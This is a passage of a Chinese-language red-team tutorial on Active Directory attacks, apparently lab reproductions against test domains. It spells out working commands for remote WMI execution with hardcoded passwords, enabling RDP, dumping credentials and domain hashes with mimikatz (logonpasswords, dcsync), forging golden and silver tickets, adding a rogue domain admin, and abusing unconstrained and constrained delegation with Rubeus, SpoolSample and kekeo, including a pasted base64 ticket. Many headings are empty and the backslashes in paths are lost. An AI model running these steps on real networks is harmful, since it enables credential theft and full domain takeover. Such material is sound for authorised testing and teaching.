# \u5bfc\u5165 Invoke-WmiCommand.ps1 \u811a\u672c\nImport-Module .Invoke-WmiCommand.ps1\n# \u6307\u5b9a\u76ee\u6807\u7cfb\u7edf\u7528\u6237\u540d\n$User = \".administrator\"\n# \u6307\u5b9a\u76ee\u6807\u7cfb\u7edf\u7684\u5bc6\u7801\n$Password = ConvertTo-SecureString -String \"123456\" -AsPlainText -Force\n# \u5c06\u8d26\u53f7\u548c\u5bc6\u7801\u6574\u5408\u8d77\u6765\uff0c\u4ee5\u4fbf\u5bfc\u5165 Credential\n$Cred = New-Object -TypeName System.Management.Automation.PSCredential\n-ArgumentList $User,$Password\n# \u6307\u5b9a\u8981\u6267\u884c\u7684\u547d\u4ee4\u548c\u76ee\u6807 IP\n$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -Comp\nuterName 192.168.0.123\n# \u5c06\u6267\u884c\u7ed3\u679c\u8f93\u51fa\u5230\u5c4f\u5e55\u4e0a\n$Remote.PayloadOutput<\/code><\/pre>\n![\"1746671941691-07fcf998-4d1c-43e5-95db-eadf4de5ea93.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1add07f9.png\")
<\/p>\nInvoke-WMIMethod<\/h3>\n
# \u6307\u5b9a\u76ee\u6807\u7cfb\u7edf\u7528\u6237\u540d\n$User=\".administrator\"\n# \u6307\u5b9a\u76ee\u6807\u7cfb\u7edf\u5bc6\u7801\n$Password=ConvertTo-SecureString -String \"123456\" -AsPlainText -Force\n# \u5c06\u8d26\u53f7\u548c\u5bc6\u7801\u6574\u5408\u8d77\u6765\uff0c\u4ee5\u4fbf\u5bfc\u5165 Credential \u4e2d\n$Cred=New-Object -TypeName System.Management.Automation.PSCredential -A\nrgumentList $User,$Password\n# \u5728\u8fdc\u7a0b\u7cfb\u7edf\u4e2d\u8fd0\u884c calc.exe \u547d\u4ee4\nInvoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList \"calc.\nexe\" -ComputerName \"192.168.0.123\" -Credential $Cred<\/code><\/pre>\n![\"1746671970434-c1a824d3-81fb-4dfc-a9b9-f0427c82baef.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1b1c924d.png\")
<\/p>\nwmic \u7684\u5176\u4ed6\u547d\u4ee4<\/h3>\n
# \u9002\u4e8e Windows xp\u3001server 2003\nwmic \/node:192.168.7.7 \/user:administrator \/password:123456 PATH win32_\nterminalservicesetting WHERE (__Class!=\"\") CALL SetAllowTSConnections 1\n# \u9002\u4e8e Windows 7\u30018\u300110\uff0cserver 2008\u30012012\u30012016\uff0c\u6ce8\u610f ServerName \u9700\u8981\u6539\n\u4e3a\u76ee\u6807\u7684 hostname\nwmic \/node:192.168.0.123 \/user:administrator \/password:123456 RDTOGGLE\nWHERE ServerName='\u8ba1\u7b97\u673a\u540d' call SetAllowTSConnections 1\n\u6216\u8005\nwmic \/node:192.168.0.123 \/user:administrator \/password:123456 process c\nall create 'cmd.exe \/c REG ADD \"HKLMSYSTEMCurrentControlSetControlT\nerminal Server\" \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f'<\/code><\/pre>\n![\"1746672006083-98781ca8-1a46-491e-9ca7-befbc8bcebf4.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1b97dba8.png\")
<\/p>\n![\"1746672011092-5fab4892-d485-4018-9af0-5195f537b064.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1bc7b031.png\")
<\/p>\nREG QUERY \"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer\" \/v fDenyTSConnections<\/code><\/pre>\n![\"1746672033496-34a9c906-f097-4110-baa2-a839fc2516c5.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1bfb66a3.png\")
<\/p>\nwmic \/node:192.168.0.141 \/user:administrator \/password:123456 process c\nall create \"shutdown.exe -r -f -t 0\"<\/code><\/pre>\nPTT \u7968\u636e\u4f20\u9012\u653b\u51fb(Pass the Ticket)<\/h2>\n
Kerberos \u534f\u8bae& Kerberos \u8ba4\u8bc1\u539f\u7406<\/h3>\n
![\"1746672069761-20926c88-7758-4b6d-ad7c-2c4b8f3feddf.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1c321ce6.png\")
<\/p>\n![\"1746672159812-45e9a6e3-7d86-452f-9038-3e1d4a337d0d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1c691712.png\")
<\/p>\n\u89d2\u8272 \u4f5c\u7528\nDomain Controller \u57df\u63a7\u5236\u5668\uff0c\u7b80\u79f0 DC\uff0c\u4e00\u53f0\u8ba1\u7b97\u673a\uff0c\u5b9e\u73b0\u7528\u6237\u3001\u8ba1\u7b97\u673a\u7684\u7edf\u4e00\u7ba1\u7406\u3002\nKey Distribution Center \u79d8\u94a5\u5206\u53d1\u4e2d\u5fc3\uff0c\u7b80\u79f0 KDC\uff0c\u9ed8\u8ba4\u5b89\u88c5\u5728\u57df\u63a7\u91cc\uff0c\u5305\u62ec AS \u548c TGS\u3002\nAuthentication Service \u8eab\u4efd\u9a8c\u8bc1\u670d\u52a1\uff0c\u7b80\u79f0 AS\uff0c\u7528\u4e8e KDC\u5bf9 Client \u8ba4\u8bc1\u3002\nTicket Grantng Service \u7968\u636e\u6388\u4e88\u670d\u52a1\uff0c\u7b80\u79f0 TGS\uff0c\u7528\u4e8eKDC \u5411 Client \u548c Server \u5206\u53d1\nSession Key \uff08\u4e34\u65f6\u79d8\u94a5\uff09\u3002\nActive Directory \u6d3b\u52a8\u76ee\u5f55\uff0c\u7b80\u79f0 AD\uff0c\u7528\u4e8e\u5b58\u50a8\u7528\u6237\u3001\u7528\u6237\u7ec4\u3001\u57df\u76f8\u5173\u7684\u4fe1\u606f\u3002\nClient \u5ba2\u6237\u7aef\uff0c\u6307\u7528\u6237\u3002\nServer \u670d\u52a1\u7aef\uff0c\u53ef\u80fd\u662f\u67d0\u53f0\u8ba1\u7b97\u673a\uff0c\u4e5f\u53ef\u80fd\u662f\u67d0\u4e2a\u670d\u52a1\u3002<\/code><\/pre>\nKerberos \u8ba4\u8bc1\u539f\u7406<\/h2>\n
![\"1746672305677-f6790584-328b-4481-bb40-139d9b9fea90.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1c9e0949.png\")
<\/p>\n\n
ASREQ & ASREP<\/h3>\n
![\"1746672411042-46d9dcb6-8a57-4c6c-ad69-1c8f360859db.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1cd3a8c6.png\")
<\/p>\nTGSREQ & TGSREP<\/h3>\n
![\"1746672488697-4d081a4b-b382-423f-ae90-473596d4bbaa.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1d0226bc.png\")
<\/p>\nAP-REQ & AP-REP<\/h3>\n
![\"1746672534359-7783d9f3-0159-4f82-9d4e-907b998f8466.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1d3bd0d1.png\")
<\/p>\nPAC<\/h2>\n
Kerberos \u8ba4\u8bc1\u4e2d\u7684\u76f8\u5173\u5b89\u5168\u95ee\u9898\u6982\u8ff0<\/h2>\n
\u9ec4\u91d1\u7968\u636e\uff08Golden ticket\uff09<\/h3>\n
\u767d\u94f6\u7968\u636e\uff08Silver ticket\uff09<\/h3>\n
MS14-068<\/h3>\n
\u5bc6\u7801\u55b7\u6d12\u653b\u51fb\uff08Password Spraying\uff09<\/h3>\n
AS-REP Roasting<\/h3>\n
\u7968\u636e\u4f20\u9012\u653b\u51fb<\/h2>\n
\u91d1\u7968 Golden ticket<\/h3>\n
\u4e00\u3001\u4f2a\u9020\u51ed\u636e\uff0c\u63d0\u5347\u57df\u5185\u666e\u901a\u7528\u6237\u7684\u6743\u9650<\/h4>\n
![\"1746674749427-daefb64b-ffe1-40ff-b53f-769856748825.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1d622352.png\")
<\/p>\n![\"1746674759462-3faba25b-7b87-4304-9152-4186e75de63d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1d8b415c.png\")
<\/p>\n![\"1746674769139-aed385b3-1e33-4270-9731-7c88584d4e68.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1dc4d858.png\")
<\/p>\nmimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\">log.txt<\/code><\/pre>\n![\"1746674808123-7890cb44-a06f-4685-ae3e-76d513491901.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1decb94d.png\")
<\/p>\n![\"1746674816654-49ba516d-b884-4b5c-9c07-92b847c92e8f.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1e146e03.png\")
<\/p>\n![\"1746674847055-e0810a0c-41ba-4947-ab7a-066052fbe06b.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1e469534.png\")
<\/p>\n![\"1746674857578-3190f038-9862-4d48-b8d4-9a4ed0e67da0.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1e6de4b4.png\")
<\/p>\nnet user moonsec123 Qwe123... \/add \/domain\nnet group \"Domain Admins\" moonsec123 \/add \/domain<\/code><\/pre>\n\u4e8c\u3001\u4f2a\u9020\u91d1\u7968<\/h4>\n
![\"1746674897932-badcd20b-a74a-4d57-b86c-8afb2f2a555c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1e9461d8.png\")
<\/p>\nmimikatz(commandline) # privilege::debug\nmimikatz(commandline) # lsadump::dcsync \/domain:moonhack.com \/all \/csv\n\u6216 lsadump::lsa \/inject\nmimikatz(commandline) # lsadump::dcsync \/domain:moonhack.com \/user:krbtgt\nmimikatz.exe \"privilege::debug\" \"lsadump::dcsync \/domain:moonsec.fbi \/a\nll \/csv\" \"exit\">loghash.txt<\/code><\/pre>\n![\"1746674915732-45abca5c-8c9d-4e3b-964d-56a394ec7d5c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1ec29c08.png\")
<\/p>\nmimikatz.exe \"kerberos::golden \/admin:system \/domain:moonhack.com \/sid:S-1-5-21-3439616436-2844000184-3841763578 \/krbtgt:4c1d57638dddb470a8588af80160f5f6 \/ticket:ticket.kirbi\" exit<\/code><\/pre>\n![\"1746674940670-01c0d68f-5e46-4383-b5a9-6f61214733f4.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1ef87425.png\")
<\/p>\n\u4e09\uff0c\u91d1\u7968\u7684\u4f7f\u7528(\u666e\u901a\u57df\u8d26\u6237\uff0c\u5229\u7528\u9ec4\u91d1\u7968\u636e\uff0c\u521b\u5efa\u57df\u7ba1\u8d26\u6237)<\/h4>\n
![\"1746674964726-61c2deff-4521-452c-9ff7-14eea51dfa63.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1f1e7a80.png\")
<\/p>\nmimikatz # kerberos::purge\nmimikatz # kerberos::ptt C:Userstestticket.kirbi<\/code><\/pre>\n![\"1746674975423-fc6df364-4da0-407c-852d-0e82ac4b365d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1f4cf98e.png\")
<\/p>\n![\"1746674983220-e56aeea6-888b-4ddb-be65-c8d155ce3656.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1f825e05.png\")
<\/p>\n\u94f6\u7968 SILVER TICKET<\/h3>\n
mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\">log.txt<\/code><\/pre>\n![\"1746675045282-709dfc3f-f07f-4237-a2f6-95697f815ce5.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1fb9678c.png\")
<\/p>\nkerberos::purge\nkerberos::golden \/domain:moonsec.fbi \/sid:S-1-5-21-3068616892-3890610424-3278931909 \/target:12server-dc.moonsec.fbi \/service:cifs \/rc4:42e2656ec24331269f82160ff5962387 \/user:administrator \/ptt<\/code><\/pre>\n![\"1746675066312-72a138f7-99af-4d35-9048-d89a6e02a436.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae1fe5602f.png\")
<\/p>\n![\"1746675085515-a3b76e9d-262a-4853-80d7-2c741594b98c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2015d852.png\")
<\/p>\n![\"1746675094545-053389a1-cbf5-473d-b02a-a52716265e9d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae204ea18f.png\")
<\/p>\ntgt::ask \/user:administrator \/domain:moonsec.fbi \/ntlm:42e2656ec24331269f82160ff5962387\n\/\/ tgt::ask \/user:\u7528\u6237\u540d \/domain:\u57df\u540d \/ntlm:NTLM Hash\nkerberos::ptt TGT_administrator@MOONSEC.FBI_krbtgt~moonsec.fbi@MOONSEC.FBI.kirbi<\/code><\/pre>\n![\"1746675113606-6ce4008e-9e61-44a9-bb00-58d81ba53010.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae207d0ae2.png\")
<\/p>\n\u91d1\u7968\u548c\u94f6\u7968\u7684\u533a\u522b<\/h3>\n
\u83b7\u53d6\u7684\u6743\u9650\u4e0d\u540c<\/h4>\n
\u8ba4\u8bc1\u6d41\u7a0b\u4e0d\u540c<\/h4>\n
\u52a0\u5bc6\u65b9\u5f0f\u4e0d\u540c<\/h4>\n
\u59d4\u6d3e\u653b\u51fb<\/h1>\n
\u975e\u7ea6\u675f\u59d4\u6d3e\u653b\u51fb<\/h2>\n
\u975e\u7ea6\u675f\u59d4\u6d3e\u5927\u81f4\u6d41\u7a0b<\/h3>\n
![\"1746683593275-3598b252-495f-4ec2-a504-ae2faf4ffb2a.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae20b45396.png\")
<\/p>\n\u642d\u5efa\u590d\u73b0<\/h3>\n
![\"1746683647344-1dfb58bd-1a77-4fef-81a3-59aa5bad50c5.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae20e23b83.png\")
<\/p>\n![\"1746683656584-f2121dd6-38c5-4697-8c65-6f559349b121.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2105c462.png\")
<\/p>\n![\"1746683669779-e8545594-f91c-4ac8-a279-4967ce728f67.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae213203f1.png\")
<\/p>\npowerview \u67e5\u8be2\u914d\u7f6e\u975e\u7ea6\u675f\u59d4\u6d3e<\/h3>\n
Import-Module .PowerView.ps1<\/code><\/pre>\n![\"1746683705336-a2e63a2b-bb04-4e14-ae02-de5623185e14.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae215a9651.png\")
<\/p>\nGet-NetUser -Unconstrained -Domain redteam.club | select name<\/code><\/pre>\n![\"1746683721806-13efd001-5d96-40c4-8903-5959b657c4a3.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2183254a.png\")
<\/p>\nadfind\u67e5\u8be2\u975e\u7ea6\u675f\u59d4\u6d3e<\/h3>\n
\u975e\u7ea6\u675f\u59d4\u6d3e\u7684\u4e3b\u673a\nAdFind.exe -b \"DC=redteam,DC=club\" -f \"(&(samAccountType=805306369)\n(userAccountControl:1.2.840.113556.1.4.803:=524288))\" cn distinguishedName\n\u975e\u7ea6\u675f\u59d4\u6d3e\u7684\u7528\u6237\uff1a\nAdFind.exe -b \"DC=redteam,DC=club\" -f \"(&(samAccountType=805306368)\n(userAccountControl:1.2.840.113556.1.4.803:=524288))\" cn distinguishedName<\/code><\/pre>\n![\"1746683748735-470af3dc-131d-4938-b07e-45bdcc033822.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae21aade55.png\")
<\/p>\n\u975e\u7ea6\u675f\u59d4\u6d3e\u653b\u51fb\u6848\u4f8b<\/h3>\n
Enter-PSSession -ComputerName 12server3<\/code><\/pre>\n![\"1746683776173-dd8e63f1-8fd1-4a80-99e5-b0230ddee25a.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae21da3241.png\")
<\/p>\nprivilege::debug\nsekurlsa::tickets \/export<\/code><\/pre>\n![\"1746683794556-06e3c728-0574-4075-8359-8f6e244649a4.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2205a986.png\")
<\/p>\n![\"1746683814881-f9b8384d-4bc1-4856-9bcb-85e8691ab572.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae22275cd5.png\")
<\/p>\nkerberos::ptt \u51ed\u8bc1\u540d\u79f0\nkerberos::list<\/code><\/pre>\n![\"1746683821905-44e7b966-948b-418b-8fed-e04fd0045016.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2248c1ae.png\")
<\/p>\n![\"1746683830845-4b134efe-dc85-4c11-be32-a0be43cb11d3.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae227705aa.png\")
<\/p>\n\u975e\u7ea6\u675f\u59d4\u6d3e&Spooler<\/h3>\n
![\"1746683848100-68e2cb9b-469d-4661-b5ff-b14ecbef4af9.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae22a54d4a.png\")
<\/p>\n![\"1746683857048-864331ea-90af-4da2-ad1d-c3deeefe09b8.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae22caa3ad.png\")
<\/p>\nRubeus.exe monitor \/interval:1 \/filteruser:ad1$\nSpoolSample.exe AD ad1 12server2<\/code><\/pre>\n![\"1746683899757-3762c1de-9312-485f-8a64-e96a553ecc1d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae22f663b5.png\")
<\/p>\n![\"1746683908792-188098b5-d0f4-433e-8996-f83d680f46b0.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae236d0efd.png\")
<\/p>\ndoIFCjCCBQagAwIBBaEDAgEWooIEEzCCBA9hggQLMIIEB6ADAgEFoQ4bDFJFRFRFQU0uQ0xVQqIhMB+g\nAwIBAqEYMBYbBmtyYnRn\ndBsMUkVEVEVBTS5DTFVCo4IDyzCCA8egAwIBEqEDAgECooIDuQSCA7WpSym3D2JdDiwMwheT5WINPhdc\nEUconea6NM+3ozPm0w5c\nI0ZK4PYsqLSpBkXTlgCW8vauiIaueKoSTxEGxj2snmINsHVMsMQ89WPpBdaew2PmIW\/\/JOjwTvnKeHgI\nfGwMAQrNo+r5pWNkuQzI\nGVb8hd0ZLO3kFUnu\/9fPKe0uVMppPPf3\/KN6Kig+Wr\/82Zd4k0OaYaZXlpbuUuFMPARrjPXG\/8EyEnTA\nRR6vGv0tib12s0NXQg+5\npxQBaB1xgT+c0xvOBxhGrTG4DFN57tkYdgKfaggvFPYBG8yKVWYypjM5nhiuMYZaz2oQoFzTQwwY45kw\nboo\/h\/qy3tMgjhqY+tFI\npjh2pWxMjUvrcFObsChsD6B4cScKSmbwo5AvBJ48ODDnAFsnYLAFwC3uzO49STp9CQQZk8+3yXSadzoC\nuKk0\/+lwOoOwdtOc27EG\nmCmseL3YH0ltCufdD2mLgf+hnC\/5PoL95UcM8K2GhaRHD0D9s+P3ZY5qH6LctZwQx1BXwsqG1d2wFGvE\nu6DbYK\/dvAeMDG1rrImI\nhvZ\/LJznMn\/V\/XmKUbHRIzgZrQb6o0Xzc0R4iYTLCaERnVUZPrBbnCwDaXm17AvoKfmW2eJU3iU\/evMC\nycqQ1urhz8Rw8MrkshSX\nV\/4EJQcOZ46I1HPWsWiJNJz8M9L2vIm7ggJ0EAh+tJzCrbt2i3gIJgiHDk1DJxb3LcCWM8vBfTQGsGXV\nb3AneKvIjtcatFrFu4LZ\ncOyoGUltn9Lo2h4OKixPusMrs9IuA3743CcMzyTxTs1avnsRHcWx9jkkohg\/q0IseMVAS2GL5WTayAqF\nAnmjP4Mc\/K3YhBphI1x\/\nUvnHsWgfAts7UTpMfAY4LouJkYHk6Sb6Y9IaQDags9oAk34PM2HA9NAJM7T2S0t\/Z+NPo0V3CKMdG6nQ\ndlvLcjXzjPRoRm52YnnN\np17YT9aEr4AgeiMKMbZCSzWPVakwUGY5wMbexaOSBU9V7IskRtw1oqGpCGI33jC8vhwn1bELJJdDM3gj\nZT4rKPlptCVvcdwvOxg6\nSyOznSR9u629N\/RHA\/+Cy6AMIKyRqcr1mNr4PGpyw9pWm++Ejmn6UWvsxXCkFsuLDuPAsGKBx3j0NX\/l\nE18Svi9NUrTFVbSfH4lu\ne9IA6UoSzTpPxPHK6d\/9JzG\/lQG\/Se+4moy6wvw\/UdL8rmtF5r4cNoZ+3s106b6W4\/A6WC6b+evpHN7g\n5umHbmMiEGVc44W6l8Wy\nIhkhIkMPNy8mnfsnA0Vco4HiMIHfoAMCAQCigdcEgdR9gdEwgc6ggcswgcgwgcWgKzApoAMCARKhIgQg\nm3Tx\/sTSXt4YJqQL1mxV\nXtQ1fOg+c00IYA2fs18EdYGhDhsMUkVEVEVBTS5DTFVCohEwD6ADAgEBoQgwBhsEQUQxJKMHAwUAYKEA\nAKURGA8yMDIxMTExODA3\nMTYxMFqmERgPMjAyMTExMTgxNzE2MTBapxEYDzIwMjExMTI1MDcxNjEwWqgOGwxSRURURUFNLkNMVUKp\nITAfoAMCAQKhGDAWGwZr\ncmJ0Z3QbDFJFRFRFQU0uQ0xVQg==<\/code><\/pre>\n[IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"\u5f97\u5230\u7684\nbase64\"))<\/code><\/pre>\n![\"1746683963005-80c6e11c-34fd-45fc-9aed-1c473fc48cde.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae239f123e.png\")
<\/p>\n![\"1746683953902-61da194f-482b-4889-bb51-f8cf74410ab8.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae241c09b9.png\")
<\/p>\n\u540e\u7eed\u518dRubeus\u5bfc\u5165base64\u7684\u7968\u636e\u76f4\u63a5\u6ce8\u5165\u8fdb\u5185\u5b58\nRubeus.exe ptt \/ticket:base64\n\u7528mimikatz\u4e5f\u53ef\nprivilege::debug\nsekurlsa::tickets \/export\n\u5bfc\u5165\u7968\u636e\u540eptt\u5373\u53ef\nkerberos::ptt XXX.kirbi\nlsadump::dcsync \/domain:redteam.club \/all \/csv\nmimikatz.exe \"lsadump::dcsync \/domain:redteam.club \/all \/csv\" \"exit\">log.txt<\/code><\/pre>\n![\"1746683989423-b769be4b-92a8-4c5d-bc65-45a089137b6c.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2464e39f.png\")
<\/p>\n\u5236\u4f5c\u9ec4\u91d1\u7968\u636e\u8bbf\u95ee\u57df\u63a7<\/h3>\n
S-1-5-21-2365300756-2663045586-4193326672<\/code><\/pre>\nkerberos::golden \/domain:redteam.club \/sid:S-1-5-21-2365300756-2663045586-\n4193326672 \/krbtgt:b6e0fcce3106665064de4917394ccc27 \/user:administrator\n\/ticket:ntlm.kirbi<\/code><\/pre>\nkerberos::ptt ntlm.kirbi\ndir \\ad1.redteam.clubc$<\/code><\/pre>\n![\"1746684049724-9ef636e1-89de-49c2-91ee-f4758b805086.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae248c0cbb.png\")
<\/p>\n\u7ea6\u675f\u59d4\u6d3e<\/h2>\n
\u7ea6\u675f\u59d4\u6d3e\u539f\u7406<\/h3>\n
![\"1746684135155-a5e4ef0f-dd29-42c6-badd-ef6eb4ad26d2.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae24b26ae3.png\")
<\/p>\n\u73af\u5883\u642d\u5efa<\/h3>\n
![\"1746684161408-e6f54f38-1ad8-49d0-b3cf-e0cbebe67525.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae24dc74e4.png\")
<\/p>\n![\"1746684166423-6e94ea44-7e9d-446b-b06e-175a1844c9bf.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae250efc46.png\")
\u5df2\u77e5\u5728\u7ea6\u675f\u59d4\u6d3e\u7684\u60c5\u51b5\u4e0b\uff0c\u670d\u52a1\u7528\u6237\u53ea\u80fd\u83b7\u53d6\u67d0\u4e2a\u7528\u6237\u6216\u8005\u4e3b\u673a\u7684\u670d\u52a1ST\uff0c\u53ea\u80fd\u7528\u6a21\u62df\u7528\u6237\u8bbf\u95ee\u7279\u5b9a\u7684\u670d\u52a1\uff0c\u662f\u65e0\u6cd5\u83b7\u53d6\u7528\u6237\u7684TGT\u7684\uff0c\u5982\u679c\u80fd\u591f\u83b7\u5f97\u5230\u5f00\u542f\u4e86\u7ea6\u675f\u59d4\u6d3e\u7684\u670d\u52a1\u7684\u7528\u6237\u7684\u660e\u6587\u5bc6\u7801\u6216\u8005hash\u5c31\u53ef\u4ee5\u4f2a\u9020S4U\u7684\u8bf7\u6c42\uff0c\u8fdb\u800c\u4f2a\u9020\u670d\u52a1\u7528\u6237\u4ee5\u4efb\u610f\u8d26\u6237\u7684\u6743\u9650\u8bbf\u95ee\u670d\u52a1\u7684ST<\/p>\n\u590d\u73b0<\/h3>\n
![\"1746684195870-ecf647f1-e0aa-486f-a142-96eeb22576b7.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae253847fc.png\")
<\/p>\nAdFind.exe -b \"DC=redteam,DC=club\" -f \"(&(samAccountType=805306368)(msds-\nallowedtodelegateto=*))\" cn distinguishedName msds-allowedtodelegateto<\/code><\/pre>\n![\"1746684212054-18ff9e24-c4a9-4fac-b800-e75a92468a26.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae2568dd6f.png\")
<\/p>\n\u901a\u8fc7kekeo\u8bf7\u6c42\u670d\u52a1\u7528\u6237\u7684TGT\ntgt::ask \/user:websec \/domain:redteam.club \/password:pass@123 \/ticket:test.kirbi\n\u540c\u7406\u6b64\u5904\u5229\u7528ntlm hash\u4e5f\u662f\u53ef\u4ee5\u8fdb\u884c\u8bf7\u6c42\u7684\ntgt::ask \/user:websec \/domain:redteam.club \/NTLM:XXXXX<\/code><\/pre>\n![\"1746684227012-c6e66583-19e8-49ba-b701-4fb140ae1e4a.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae25a86c94.png\")
<\/p>\n\u5229\u7528\u8fd9\u4e2a\u7968\u636e\u901a\u8fc7\u4f2a\u9020S4U\u8bf7\u6c42\u4ee5administrator\u8eab\u4efd\u8bbf\u95eewebsec\u7684ST\ntgs::s4u \/tgt:TGT_websec@REDTEAM.CLUB_krbtgt~redteam.club@REDTEAM.CLUB.kirbi\n\/user:Administrator@reteam.club \/service:cifs\/ad1.redteam.club<\/code><\/pre>\n![\"1746684241141-117f36af-34bf-4200-8958-22ffb5aac53e.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae25d025e4.png\")
<\/p>\nkeberos::ptt\nTGS_Administrator@redteam.club@REDTEAM.CLUB_cifs~ad1.redteam.club@REDTEAM.CLUB.kirbi<\/code><\/pre>\n![\"1746684269239-214acf2e-e8c7-40e0-8211-906aceda786d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae25fac4e6.png\")
<\/p>\n\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e<\/h3>\n
\n\u6ce8\u610f\uff1aserver2012\u624d\u5f15\u5165\u4e86\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff01\uff01\uff01<\/p>\n\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u539f\u7406<\/h3>\n
REDTEAMhack -> WriteProperty\uff08\u5c06\u673a\u5668\u52a0\u5165\u57df\u7684\u8d26\u53f7\uff0c\u4e5f\u5c31\u662fmS-DS-CreatorSID\u5c5e\u6027\u4e2d\u7684\u8d26\u6237\uff09\nNT AUTHORITYSELF -> WriteProperty\uff08\u673a\u5668\u8d26\u6237\u81ea\u8eab\u4e5f\u53ef\u4ee5\u4fee\u6539\uff09\n\u6211\u4eec\u518d\u56de\u987e\u4e00\u4e2a\u77e5\u8bc6\u70b9\uff0c\u9ed8\u8ba4\u57df\u63a7\u7684ms-DS-MachineAccountQuota\u5c5e\u6027\u8bbe\u7f6e\u5141\u8bb8\u6240\u6709\u57df\u7528\u6237\u5411\u4e00\u4e2a\u57df\u6dfb\u52a0\n\u591a\u8fbe10\u4e2a\u8ba1\u7b97\u673a\u5e10\u6237\uff0c\u5c31\u662f\u8bf4\u53ea\u8981\u6709\u4e00\u4e2a\u57df\u51ed\u636e\u5c31\u53ef\u4ee5\u5728\u57df\u5185\u4efb\u610f\u6dfb\u52a0\u673a\u5668\u8d26\u6237\u3002\u8fd9\u4e2a\u51ed\u636e\u53ef\u4ee5\u662f\u57df\u5185\u7684\u7528\u6237\n\u8d26\u6237\u3001\u670d\u52a1\u8d26\u6237\u3001\u673a\u5668\u8d26\u6237<\/code><\/pre>\n\u590d\u73b01 \u5229\u7528\u666e\u901a\u57df\u8d26\u53f7\u63d0\u5347\u5230\u57df\u672c\u5730\u7ba1\u7406\u5458<\/h3>\n
